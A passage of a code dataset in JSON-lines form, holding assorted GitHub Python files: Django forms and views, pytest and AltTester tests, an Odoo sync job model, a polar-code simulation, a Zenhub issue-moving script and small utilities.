client.post(f\"{settings.API_V1_STR}/contributions\",\n json={'user': \"Jimbo Wales\"})\n assert r.status_code == 200\n\n\n@pytest.mark.asyncio\nasync def test_get_user_contributions_over_time(client: AsyncClient):\n r = await client.post(f\"{settings.API_V1_STR}/contributions/stats_over_time\",\n json={'user': \"Jimbo Wales\", \"interval\": 86400})\n assert r.status_code == 
200\n","repo_name":"SH659/WikiAnalyzer","sub_path":"app/tests/api/api_v1/test_contributions.py","file_name":"test_contributions.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26694996225","text":"file1 = open(\"./logs/pythonlog.txt\", 'r+')\navg1 = 0.0\nlines1 = 0.0\nfor line in file1:\n lines1 = lines1 + 1.0\n avg1 = (avg1 + float(line))\navg1 = avg1/lines1\nprint(avg1, \"for Python with\", lines1, \"lines\")\n\n\nfile2 = open(\"./logs/clog.txt\", 'r+')\navg2 = 0.0\nlines2 = 0.0\nfor line in file2:\n lines2 = lines2 + 1.0\n avg2 = (avg2 + float(line))\navg2 = avg2/lines2\nprint(avg2, \"for C with\", lines2, \"lines\")\n\n\nfile3 = open(\"./logs/cpplog.txt\", 'r+')\navg3 = 0.0\nlines3 = 0.0\nfor line in file3:\n lines3 = lines3 + 1.0\n avg3 = (avg3 + float(line))\navg3 = avg3/lines3\nprint(avg3, \"for C++ with\", lines3, \"lines\")\n\n\nfile4 = open(\"./logs/javalog.txt\", 'r+')\navg4 = 0.0\nlines4 = 0.0\nfor line in file4:\n lines4 = lines4 + 1.0\n avg4 = (avg4 + float(line))\navg4 = avg4/lines4\nprint(avg4, \"for Java with\", lines4, \"lines\")\n\nword = \"\"\nwhile(word.lower() != \"y\" and word.lower() != \"n\"):\n word = input(\"Do you want to wipe the previous log? [Y/N]\")\n if(word.lower() == \"y\"):\n file1.truncate(0)\n file3.truncate(0)\n file2.truncate(0)\n file4.truncate(0)\nprint(\"Done.\")\n\nfile4.close()\nfile3.close()\nfile2.close()\nfile1.close()\n","repo_name":"Aniket965/Hello-world","sub_path":"speedTester/logs/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1462,"dataset":"github-code","pt":"44"} +{"seq_id":"7073641264","text":"import encoder\nimport sc_decoder\nimport channel\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef sc_main(N, k, total_message_bits, snr):\n error = 0\n for _ in range(total_message_bits // k):\n message = [random.randint(0, 1) for _ in range(k)]\n code, channel_states = encoder.encoder(message, N, k)\n channel_input = channel.bpsk(code)\n n0 = (10 ** (- 0.1 * snr))\n channel_output = channel.AWGN(channel_input, n0)\n recieved_message = []\n sc_decoder.decoder(channel_output, channel_states, recieved_message, N)\n # print(f'message = {message}')\n # print(f'recieved message = {recieved_message}')\n # if message == recieved_message:\n # print('yes')\n # else:\n # print(f'message = {message}')\n # print(f'recieved message = {recieved_message}')\n if recieved_message != message:\n for i in range(k):\n if recieved_message[i] != message[i]:\n error += 1\n \n return error / total_message_bits\n\n\nN, k = 256, 128\ntotal_message_bits = k * 500\n# print(sc_main(N, k, total_message_bits, 3))\n\nsnr_arr = np.arange(1, 5, 1.0)\nber_arr = np.zeros_like(snr_arr)\n\nfor i, el in enumerate(snr_arr):\n ber_arr[i] = sc_main(N, k, total_message_bits, el)\n\n# print(ber_arr)\n\n\n'''plotting'''\n\nplt.plot(snr_arr, ber_arr)\nplt.yscale('log')\nplt.axis([1, 5, 0.001, 1])\nplt.ylabel('BER')\nplt.xlabel('Eb/N0 (dB)')\nplt.title(f'BER vs SNR SC ({N}, {k})')\nplt.show()\n\n\n################# timeit code ####################\n\n# a = [-1] * 128\n# b = [1] * 128\n# print(timeit.timeit(\"g(a, b, 126)\", setup=\"from __main__ import g, a, b\", 
number=62500))","repo_name":"Ashish-G-A/Polar-code-simulation","sub_path":"polar_codes_main.py","file_name":"polar_codes_main.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33520338609","text":"from django import forms\nfrom django.core.validators import validate_email\nfrom django.utils.translation import gettext_lazy as _ #for post type\nfrom django.core.exceptions import ValidationError\nfrom .models import Article\n\nBIRTH_YEAR_CHOICES = ['1980', '1981', '1982']\nFAVORITE_COLORS_CHOICES = [\n ('blue', 'Blue'),\n ('green', 'Green'),\n ('black', 'Black'),\n \n]\n\nclass NameForm(forms.Form):\n\n your_name = forms.CharField(label='Your name', max_length=100)\n subject = forms.CharField(max_length=100)\n message = forms.CharField(widget=forms.Textarea)\n sender = forms.EmailField()\n cc_myself = forms.BooleanField(required=False)\n birth_year = forms.DateField(widget=forms.SelectDateWidget(years=BIRTH_YEAR_CHOICES))\n single_color = forms.ChoiceField(required=False, choices=FAVORITE_COLORS_CHOICES)\n favorite_colors = forms.MultipleChoiceField(\n required=False,\n widget=forms.RadioSelect,\n choices=FAVORITE_COLORS_CHOICES,\n )\n comment = forms.CharField(widget=forms.TextInput(attrs={'size': '40'}))\n\n your_name.widget.attrs.update({'class': 'special'})\n\n template_name = \"form_template.html\"\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n # Use the parent's handling of required fields, etc.\n super().validate(value)\n for sender in value:\n validate_email(sender)\n\n def clean(self):\n cleaned_data = super().clean()\n cc_myself = cleaned_data.get(\"cc_myself\")\n subject = cleaned_data.get(\"subject\")\n\n if cc_myself and subject:\n # Only do something if both fields are valid so far.\n if \"help\" not in subject:\n raise ValidationError(\n \"Did not send for 'help' in the subject despite \"\n \"CC'ing yourself.\"\n )\n \n def send_email(self):\n # send email using the self.cleaned_data dictionary\n pass\n\nclass ArticleForm(forms.ModelForm):\n # title = forms.CharField(label='Your name', max_length=100)\n class Meta:\n model = Article\n # fields = ['title','author']\n fields = '__all__'\n localized_fields = ('publish_on',)\n widgets = {\n 'description': forms.Textarea(attrs={'cols': 80, 'rows': 20}),\n }\n labels = {\n 'title': _('Your name'),\n }\n help_texts = {\n 'title': _('Some useful help text.'),\n }\n error_messages = {\n 'title': {\n 'max_length': _(\"This writer's name is too long.\"),\n },\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['title'].widget.attrs.update({'class': 'special'})\n\n def clean_title(self):\n # custom validation for the title field\n pass\n\n\n","repo_name":"Subham043/django-docker","sub_path":"mysite/blogs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2780909504","text":"from base.constants.cache import CacheConstants\nfrom ..env import PROJECT_DIR\nfrom ..env import env\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"base.cache.RedisClusterClient\",\n \"LOCATION\": env.str(\"DEFAULT_REDIS_URL\"),\n \"TIMEOUT\": 300,\n },\n CacheConstants.CACHE_DISK_STR: {\n \"BACKEND\": \"base.cache.DiskCacheClient\",\n \"LOCATION\": f\"{PROJECT_DIR}/_disk_cache\",\n \"TIMEOUT\": 300,\n # ^-- Django setting for default timeout of 
each key.\n \"SHARDS\": 8,\n \"DATABASE_TIMEOUT\": 0.010, # 10 milliseconds\n # ^-- Timeout for each DjangoCache database transaction.\n \"OPTIONS\": {\"size_limit\": 2**30}, # 1 gigabyte\n },\n CacheConstants.CACHE_LOCK_STR: {\n \"BACKEND\": \"base.cache.RedisCacheClient\",\n \"LOCATION\": env.str(\"LOCK_REDIS_URL\"),\n },\n}\n","repo_name":"d54365/smorgasbord","sub_path":"smorgasbord/config/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19574356230","text":"import transaction\n\nfrom admin.views import main_table, main_admin\nfrom dbas.database import DBDiscussionSession\nfrom dbas.database.discussion_model import User\nfrom dbas.tests.utils import construct_dummy_request, TestCaseWithConfig\n\n\nclass AdminViewTest(TestCaseWithConfig):\n def __update_user(self, nickname):\n db_user = DBDiscussionSession.query(User).filter_by(nickname=nickname).first()\n db_user.update_last_login()\n db_user.update_last_action()\n transaction.commit()\n\n def test_main_admin_no_author(self):\n request = construct_dummy_request()\n response = main_admin(request)\n self.assertIn('title', response)\n self.assertIn('project', response)\n self.assertIn('extras', response)\n self.assertIn('dashboard', response)\n\n def test_main_admin(self):\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n self.__update_user('Tobias')\n request = construct_dummy_request()\n response = main_admin(request)\n self.assertIn('title', response)\n self.assertIn('project', response)\n self.assertIn('extras', response)\n self.assertIn('dashboard', response)\n\n def test_main_table_no_author(self):\n request = construct_dummy_request()\n response = main_table(request)\n self.assertEqual(400, response.status_code)\n\n def test_main_table_error(self):\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n request = construct_dummy_request(matchdict={'table': 'fu'})\n response = main_table(request)\n self.assertEqual(400, response.status_code)\n\n def test_main_table(self):\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n request = construct_dummy_request(matchdict={'table': 'User'})\n response = main_table(request)\n self.assertIn('title', response)\n self.assertIn('project', response)\n self.assertIn('extras', response)\n self.assertIsNotNone(response['table'].get('name'))\n self.assertIsNotNone(response['table'].get('has_elements'))\n self.assertIsNotNone(response['table'].get('count'))\n self.assertIsNotNone(response['table'].get('head'))\n self.assertIsNotNone(response['table'].get('row'))\n","repo_name":"hhucn/dbas","sub_path":"admin/tests/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"15147517469","text":"from odoo import api, fields, models\nfrom odoo.tools.translate import _\n\nfrom odoo.addons.queue_job.job import DONE, ENQUEUED, FAILED, PENDING, STARTED\n\nfrom .ir_logging import LOG_CRITICAL, LOG_ERROR, LOG_WARNING\n\nDONE_WARNING = \"done_warning\"\nTRIGGER_MODEL2FIELD = {\n \"sync.trigger.cron\": \"trigger_cron_id\",\n \"sync.trigger.automation\": \"trigger_automation_id\",\n \"sync.trigger.webhook\": \"trigger_webhook_id\",\n \"sync.trigger.button\": \"trigger_button_id\",\n}\nTRIGGER_FIELDS = TRIGGER_MODEL2FIELD.values()\n\n\nclass SyncJob(models.Model):\n\n _name = \"sync.job\"\n 
_description = \"Sync Job\"\n _rec_name = \"trigger_name\"\n _order = \"id desc\"\n\n trigger_name = fields.Char(compute=\"_compute_trigger_name\", store=True)\n trigger_cron_id = fields.Many2one(\"sync.trigger.cron\", readonly=True)\n trigger_automation_id = fields.Many2one(\"sync.trigger.automation\", readonly=True)\n trigger_webhook_id = fields.Many2one(\"sync.trigger.webhook\", readonly=True)\n trigger_button_id = fields.Many2one(\"sync.trigger.button\", readonly=True)\n task_id = fields.Many2one(\"sync.task\", compute=\"_compute_sync_task_id\", store=True)\n project_id = fields.Many2one(\n \"sync.project\", related=\"task_id.project_id\", readonly=True\n )\n parent_job_id = fields.Many2one(\"sync.job\", readonly=True)\n job_ids = fields.One2many(\"sync.job\", \"parent_job_id\", \"Sub jobs\", readonly=True)\n log_ids = fields.One2many(\"ir.logging\", \"sync_job_id\", readonly=True)\n log_count = fields.Integer(compute=\"_compute_log_count\")\n queue_job_id = fields.Many2one(\"queue.job\", string=\"Queue Job\", readonly=True)\n queue_job_state = fields.Selection(\n related=\"queue_job_id.state\", readonly=True, string=\"Queue Job State\"\n )\n function = fields.Char(string=\"Task Function\")\n func_string = fields.Char(\n related=\"queue_job_id.func_string\", readonly=True, string=\"Function\"\n )\n retry = fields.Integer(related=\"queue_job_id.retry\", readonly=True)\n max_retries_str = fields.Char(compute=\"_compute_max_retries_str\")\n state = fields.Selection(\n [\n (PENDING, \"Pending\"),\n (ENQUEUED, \"Enqueued\"),\n (STARTED, \"Started\"),\n (DONE, \"Done\"),\n (DONE_WARNING, \"Done With Warnings\"),\n (FAILED, \"Failed\"),\n ],\n compute=\"_compute_state\",\n )\n in_progress = fields.Boolean(\n compute=\"_compute_state\",\n )\n\n @api.depends(\"queue_job_id.max_retries\")\n def _compute_max_retries_str(self):\n for r in self:\n max_retries = r.queue_job_id.max_retries\n if not max_retries:\n r.max_retries_str = _(\"infinity\")\n else:\n r.max_retries_str = str(max_retries)\n\n @api.depends(\"queue_job_id.state\", \"job_ids.queue_job_id.state\", \"log_ids.level\")\n def _compute_state(self):\n for r in self:\n jobs = r + r.job_ids\n states = [q.state for q in jobs.mapped(\"queue_job_id\")]\n levels = {log.level for log in jobs.mapped(\"log_ids\")}\n computed_state = DONE\n has_errors = any(lev in [LOG_CRITICAL, LOG_ERROR] for lev in levels)\n has_warnings = any(lev == LOG_WARNING for lev in levels)\n for s in [FAILED, STARTED, ENQUEUED, PENDING]:\n if any(s == ss for ss in states):\n computed_state = s\n break\n if computed_state == DONE and has_errors:\n computed_state = FAILED\n elif computed_state == DONE and has_warnings:\n computed_state = DONE_WARNING\n\n r.state = computed_state\n r.in_progress = any(s in [PENDING, ENQUEUED, STARTED] for s in states)\n\n @api.depends(\"log_ids\")\n def _compute_log_count(self):\n for r in self:\n r.log_count = len(r.log_ids)\n\n @api.depends(\"parent_job_id\", *TRIGGER_FIELDS)\n def _compute_sync_task_id(self):\n for r in self:\n if r.parent_job_id:\n r.task_id = r.parent_job_id.task_id\n for f in TRIGGER_FIELDS:\n obj = getattr(r, f)\n if obj:\n r.task_id = obj.sync_task_id\n break\n\n @api.depends(*TRIGGER_FIELDS)\n def _compute_trigger_name(self):\n for r in self:\n if r.parent_job_id:\n r.trigger_name = (r.parent_job_id.trigger_name or \"\") + \".\" + r.function\n continue\n for f in TRIGGER_FIELDS:\n t = getattr(r, f)\n if t:\n r.trigger_name = t.trigger_name\n break\n\n def create_trigger_job(self, trigger):\n return self.create(\n 
{\n TRIGGER_MODEL2FIELD[trigger._name]: trigger.id,\n \"function\": trigger._sync_handler,\n }\n )\n\n def refresh_button(self):\n # magic empty method to refresh form content\n pass\n\n def requeue_button(self):\n self.queue_job_id.requeue()\n","repo_name":"AbdulrhmanGad/zania","sub_path":"sync/models/sync_job.py","file_name":"sync_job.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"37228487377","text":"import argparse\nfrom python.config.logging_config import logging\n\nfrom python.services.zenhub_service import ZenhubService\n\n\ndef get_issues(zenhub: ZenhubService, label, from_pipeline: str) -> list | Exception:\n from_pipeline_id = zenhub.get_pipeline_id(from_pipeline)\n if from_pipeline_id is None:\n logging.error(\n f\"Failed to get pipeline ID for pipeline {from_pipeline}\")\n raise ValueError\n\n return zenhub.search_issues_by_label(from_pipeline_id, label)\n\n\ndef move_issues(zenhub: ZenhubService, issues_to_move, to_pipeline):\n to_pipeline_id = zenhub.get_pipeline_id(to_pipeline)\n if to_pipeline_id is None:\n logging.error(f\"Failed to get pipeline ID for pipeline {to_pipeline}\")\n raise ValueError\n\n for issue in issues_to_move:\n logging.info(f\"Moving issue {issue['id']} to pipeline {to_pipeline}\")\n success = zenhub.move_issue_to_pipeline(issue['id'], to_pipeline_id)\n if not success:\n logging.error(\n f\"Failed to move issue {issue['id']} to pipeline {to_pipeline}\")\n raise ValueError\n\n\ndef add_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--api_token\",\n type=str,\n required=True,\n help=\"The zenhub api token to use.\",\n )\n\n parser.add_argument(\n \"--repo_id\",\n type=int,\n default=223385041, # This is the ID of the \"operations-engineering\" repo\n help=\"The ID of a GitHub repository that exists in your Zenhub workspace.\",\n )\n\n parser.add_argument(\n \"--label\",\n type=str,\n default=\"dependencies\",\n help=\"The label attached to the GitHub issue.\",\n )\n\n parser.add_argument(\n \"--from_pipeline\",\n type=str,\n default=\"New Issues\",\n help=\"The name of the pipeline to move the issue from.\",\n )\n\n parser.add_argument(\n \"--to_pipeline\",\n type=str,\n default=\"Refined and Ready\",\n help=\"The name of the pipeline to move the issue to.\",\n )\n\n return parser.parse_args()\n\n\ndef main():\n args = add_arguments()\n\n zenhub = ZenhubService(args.api_token)\n try:\n zenhub.workspace_id = zenhub.get_workspace_id_from_repo(args.repo_id)\n except Exception as e:\n return e\n\n try:\n issues = get_issues(zenhub, args.label, args.from_pipeline)\n except Exception as e:\n return e\n\n if len(issues) == 0:\n logging.warning(\n f\"No issues found with label {args.label}, closing script.\")\n return\n\n try:\n move_issues(zenhub, issues, args.to_pipeline)\n except Exception as e:\n return e\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ministryofjustice/operations-engineering","sub_path":"python/scripts/move_dependabot_tickets.py","file_name":"move_dependabot_tickets.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"21224340448","text":"from unittest import TestCase\nfrom unittest.mock import patch\nfrom game import Game, Card, UnauthorisedNumberOfDecksException, UnknownMatchTypeException\n\nclass Test(TestCase):\n\n def test_negative_number_of_cards(self):\n # checks that the constructor 
throws an exception if we have a negative number in the place of numberOfDecks\n with self.assertRaises(UnauthorisedNumberOfDecksException):\n game = Game(-1,\"values\")\n\n def test_float_number_of_cards(self):\n # checks that the constructor throws an exception if we have a float number in the place of numberOfDecks\n with self.assertRaises(UnauthorisedNumberOfDecksException):\n game = Game(1.5,\"values\")\n\n def test_string_number_of_cards(self):\n # checks that the constructor throws an exception if we have a string in the place of numberOfDecks\n with self.assertRaises(UnauthorisedNumberOfDecksException):\n game = Game(\"1.5\",\"values\")\n\n def test_negative_unknown_match(self):\n # checks that the constructor throws an exception if we have an unknown match type\n with self.assertRaises(UnknownMatchTypeException):\n game = Game(1,\"value\")\n\n def test_pick_a_card(self):\n # tests that the card that was picked is in the deck\n game = Game(1,\"values\")\n result = game.pickCard()\n self.assertIn(result,game.deck)\n\n @patch(\"game.Game.pickCard\")\n def test_pick_a_card_from_deck(self, pickcard):\n # tests that after all cards of a type are taken out of the deck, you can't pick the same card again\n pickcard.return_value = Card(\"king\",\"hearts\")\n game = Game(2, \"values\")\n game.addToPile(Card(\"king\",\"hearts\"))\n game.addToPile(Card(\"king\",\"hearts\"))\n self.assertEqual(game.pile, 2)\n card = game.pickCard()\n game.addToPile(card)\n self.assertEqual(game.pile, 2)\n\n def test_add_to_pile(self):\n # checks that a card has been added to the pile\n game = Game(1, \"values\")\n game.addToPile(Card(\"king\",\"hearts\"))\n self.assertEqual(game.pile,1)\n\n def test_pick_player(self):\n # tests that the random number generator has picked a valid player\n game = Game(1, \"values\")\n player = game.pickPlayer([\"A\",\"B\"])\n self.assertIn(player,[\"A\",\"B\"])\n\n def test_take_pile(self):\n # checks that after a player wins a round, the pile gets added to their score\n game = Game(1,\"values\")\n game.addToPile(Card(\"king\",\"hearts\"))\n game.addToPile(Card(\"3\",\"clubs\"))\n game.takePile(\"A\")\n self.assertEqual(game.scores,[2,0])\n\n def test_match(self):\n # checks that the match functions work as expected\n game = Game(1,\"suits\")\n cards = [Card(\"king\",\"hearts\"),Card(\"3\",\"hearts\")]\n self.assertEqual(game.match(cards),True)\n game = Game(1, \"values\")\n cards = [Card(\"king\", \"hearts\"), Card(\"3\", \"hearts\")]\n self.assertEqual(game.match(cards), False)\n game = Game(1, \"values\")\n cards = [Card(\"king\", \"hearts\"), Card(\"king\", \"clubs\")]\n self.assertEqual(game.match(cards), True)\n game = Game(1, \"values\")\n cards = [Card(\"king\", \"hearts\"), Card(\"queen\", \"clubs\")]\n self.assertEqual(game.match(cards), False)\n\n def test_get_cards_for_players(self):\n # checks that valid cards were picked for each player and the correct number of cards were added to the pile\n game = Game(1, \"values\")\n cards = game.getCardsForPlayers()\n self.assertNotIn(cards[0],game.deck)\n self.assertNotIn(cards[1], game.deck)\n self.assertIn(cards[0].suit,game.suits)\n self.assertIn(cards[1].suit, game.suits)\n self.assertIn(cards[0].value, game.values)\n self.assertIn(cards[1].value, game.values)\n self.assertEquals(game.pile, 2)\n\n def test_compare_cards_and_pick_player(self):\n # checks that, given two cards that have been picked out, the right score gets calculated\n cards = [Card(\"ace\",\"hearts\"),Card(\"ace\",\"clubs\")]\n game = Game(1, 
\"values\")\n game.pile = 2\n game.compareCardsAndPickWinner(cards)\n self.assertEquals(set(game.scores),set([2,0]))\n\n @patch(\"game.Game.pickPlayer\")\n def test_play_draw(self, player):\n # checks that after a number of rounds have been played, the draw condition can be achieved\n player.return_value = \"A\"\n game = Game(2, \"values\")\n game.deck = {\n Card(\"ace\",\"spades\"): 2,\n }\n game.pile = 0\n game.scores =[50,52]\n self.assertEquals(game.play(),\"DRAW\")\n\n @patch(\"game.Game.pickPlayer\")\n def test_play_A_wins(self, player):\n # checks that if player A wins, the right output gets returned\n player.return_value = \"A\"\n game = Game(2, \"values\")\n game.deck = {\n Card(\"ace\", \"spades\"): 2,\n }\n game.pile = 0\n game.scores = [52, 48]\n self.assertEquals(game.play(), \"A\")\n\n @patch(\"game.Game.pickPlayer\")\n def test_play_B_wins(self, player):\n # checks that if player B wins, then the right output gets returned\n player.return_value = \"B\"\n game = Game(2, \"suits\")\n game.deck = {\n Card(\"ace\", \"spades\"): 2,\n Card(\"2\", \"spades\"): 2,\n }\n game.pile = 0\n game.scores = [48, 48]\n self.assertEquals(game.play(), \"B\")\n","repo_name":"alinasuiu/match","sub_path":"tests/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18068800887","text":"# Busca Gulosa (Greedy Search):\n# A busca gulosa escolhe o próximo nó que parece mais promissor com base em uma heurística. Pode não levar à solução ótima, mas é rápida e eficiente.\n\ndef greedy_search(graph, start_node, target_node, heuristic):\n priority_queue = [(heuristic[start_node], start_node)]\n visited = set()\n\n while priority_queue:\n cost, current_node = priority_queue.pop(0)\n\n if current_node == target_node:\n return visited\n\n visited.add(current_node)\n\n for neighbor in graph[current_node]:\n if neighbor not in visited:\n priority_queue.append((heuristic[neighbor], neighbor))\n priority_queue.sort()\n\n return visited\n\n\nheuristic = {\n 'A': 2,\n 'B': 3,\n 'C': 1,\n 'D': 4,\n 'E': 5,\n 'F': 0\n}\n\ngraph = {\n 'A': ['B', 'C'],\n 'B': ['D', 'E'],\n 'C': ['F'],\n 'D': [],\n 'E': ['F'],\n 'F': []\n}\n\nstart_node = 'A'\ntarget_node = 'F'\n\nresult = greedy_search(graph, start_node, target_node, heuristic)\nprint(f'Nós visitados pela busca gulosa: {result}')\n","repo_name":"pescador95/grafos","sub_path":"nao-ponderados/busca gulosa.py","file_name":"busca gulosa.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"1142363428","text":"# region IMPORT\nimport functools\nfrom .logger import Logger\n\n# endregion IMPORT\n\n\nclass ErrorHandler:\n def generic_errorhandler(func):\n \"\"\"\n - Handles Generic Errors and returns '-'\n \"\"\"\n\n printError = lambda e: Logger.print_as_error(cat=\"err-r\", message=f\"ERROR: {e.__class__.__name__.upper()} - {e} \")\n\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n try:\n result = func(*args, **kwargs)\n return result\n\n except Exception as e:\n printError(e)\n return \"-\"\n\n return wrapper\n","repo_name":"sree-r-one/farm-stack-introduction","sub_path":"backend/utils/errorhandler.py","file_name":"errorhandler.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33564255549","text":"from django.http.response 
import HttpResponse\nfrom accounts.views import train\nfrom accounts.form import TrainDetailForm\nfrom accounts.models import TrainDetail\nfrom django.shortcuts import redirect, render\n\n\ndef create (request):\n if request.method ==\"GET\":\n train=TrainDetail()\n train.Train_id = request.GET['Train_id']\n train.Train_name=request.GET['Train_name']\n train.Route_id=request.GET['Route_id']\n train.Arrival_time = request.GET['Arrival_time']\n train.Departure_time = request.GET['Departure_time']\n train.save()\n return redirect('train')\n else: \n form =TrainDetailForm() \n return render(request,'accounts/trainIDDetails.html',{'form':form})\ndef summa(request):\n return render(request,'accounts/traincreate.html')\n\ndef edit(request,id):\n return render(request,'accounts/trainedit.html',{'id':id})\n\ndef update(request,id):\n object=TrainDetail.objects.get(id=id)\n object.Train_id = request.GET['Train_id']\n object.Train_name=request.GET['Train_name']\n object.Route_id=request.GET['Route_id']\n object.Arrival_time = request.GET['Arrival_time']\n object.Departure_time = request.GET['Departure_time']\n object.save()\n return redirect('train')\n\ndef delete(request,id): \n TrainDetail.objects.filter(id=id).delete()\n return redirect('train')\n","repo_name":"SibiChakravarthy7311/RailwayReservation","sub_path":"accounts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73843098371","text":"from django.test import TestCase\nfrom django.db import transaction\nfrom django.db.utils import IntegrityError\n\nfrom django.contrib.auth import get_user_model\n\nfrom .models import Post\n\n# Create your tests here.\n\nclass PostTest(TestCase):\n\n\tdef test_create_post(self):\n\t\tpost = Post()\n\t\tuser = get_user_model()\n\n\t\t#post['userid'] = 'kim1124'\n\t\tpost['content'] = '테스트 케이스로 작성된 글입니다.'\n\t\tpost['locked'] = False\n\t\tpost['hidden'] = False\n\n\t\twith transaction.atomic():\n\t\t\twith self.assertRaises(IntegrityError):\n\t\t\t\tpost.save()\n\n\t\tself.assertIsNone(post.pk)\n\n\t\tpost.save()\n\t\tself.assertIsNotNone(post.pk)","repo_name":"kim1124/Projects","sub_path":"Django-Web/FastCampus/day5_review/pystagram/photos/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35291151","text":"import time\n\nimport pytest\n\nfrom .utils import Scenes\nfrom alttester import By, AltKeyCode\n\n\nclass TestScene05:\n\n @pytest.fixture(autouse=True)\n def setup(self, altdriver):\n self.altdriver = altdriver\n self.altdriver.reset_input()\n self.altdriver.load_scene(Scenes.Scene05)\n\n def test_movement_cube(self):\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n initial_position = (cube.worldX, cube.worldY, cube.worldZ)\n\n self.altdriver.scroll(speed_vertical=30, duration=0.1, wait=False)\n self.altdriver.press_key(AltKeyCode.K, power=1, duration=0.1, wait=False)\n\n self.altdriver.press_key(AltKeyCode.O, power=1, duration=0.1)\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n final_position = (cube.worldX, cube.worldY, cube.worldZ)\n\n assert initial_position != final_position\n\n def test_camera_movement(self):\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n initial_position = (cube.worldX, cube.worldY, cube.worldY)\n\n self.altdriver.press_key(AltKeyCode.W, power=1, duration=0.1, wait=False)\n # 
time.sleep(2)\n\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n final_position = (cube.worldX, cube.worldY, cube.worldY)\n\n assert initial_position != final_position\n\n def test_update_altObject(self):\n\n cube = self.altdriver.find_object(By.NAME, \"Player1\")\n initial_position_z = cube.worldZ\n\n self.altdriver.press_key(AltKeyCode.W, power=1, duration=0.1, wait=False)\n time.sleep(5)\n\n assert initial_position_z != cube.update_object().worldZ\n\n def test_creating_stars(self):\n stars = self.altdriver.find_objects_which_contain(By.NAME, \"Star\", By.NAME, \"Player2\")\n assert len(stars) == 1\n\n self.altdriver.find_objects_which_contain(By.NAME, \"Player\", By.NAME, \"Player2\")\n pressing_point_1 = self.altdriver.find_object(By.NAME, \"PressingPoint1\", By.NAME, \"Player2\")\n\n self.altdriver.move_mouse(pressing_point_1.get_screen_position(), duration=0.1, wait=False)\n time.sleep(0.1)\n\n self.altdriver.press_key(AltKeyCode.Mouse0, power=1, duration=0.1, wait=False)\n pressing_point_2 = self.altdriver.find_object(By.NAME, \"PressingPoint2\", By.NAME, \"Player2\")\n self.altdriver.move_mouse(pressing_point_2.get_screen_position(), duration=0.1)\n self.altdriver.press_key(AltKeyCode.Mouse0, power=1, duration=0.1, wait=False)\n time.sleep(0.1)\n\n stars = self.altdriver.find_objects_which_contain(By.NAME, \"Star\")\n assert len(stars) == 3\n\n def test_power_joystick(self):\n button_names = [\"Horizontal\", \"Vertical\"]\n keys_to_press = [AltKeyCode.D, AltKeyCode.W]\n\n axis_name = self.altdriver.find_object(By.NAME, \"AxisName\")\n axis_value = self.altdriver.find_object(By.NAME, \"AxisValue\")\n\n for button_name, key in zip(button_names, keys_to_press):\n self.altdriver.press_key(key, power=0.5, duration=1)\n\n assert axis_value.get_text() == \"0.5\"\n assert axis_name.get_text() == button_name\n\n def test_scroll(self):\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_initial_position = [player2.worldX, player2.worldY, player2.worldY]\n self.altdriver.scroll(4, duration=1, wait=False)\n time.sleep(1)\n\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_final_position = [player2.worldX, player2.worldY, player2.worldY]\n assert cube_initial_position != cube_final_position\n\n def test_scroll_and_wait(self):\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_initial_position = [player2.worldX, player2.worldY, player2.worldY]\n self.altdriver.scroll(4, duration=0.3)\n\n player2 = self.altdriver.find_object(By.NAME, \"Player2\")\n cube_final_position = [player2.worldX, player2.worldY, player2.worldY]\n assert cube_initial_position != cube_final_position\n\n def test_key_down_and_key_up(self):\n self.altdriver.key_down(AltKeyCode.A)\n\n last_key_down = self.altdriver.find_object(By.NAME, 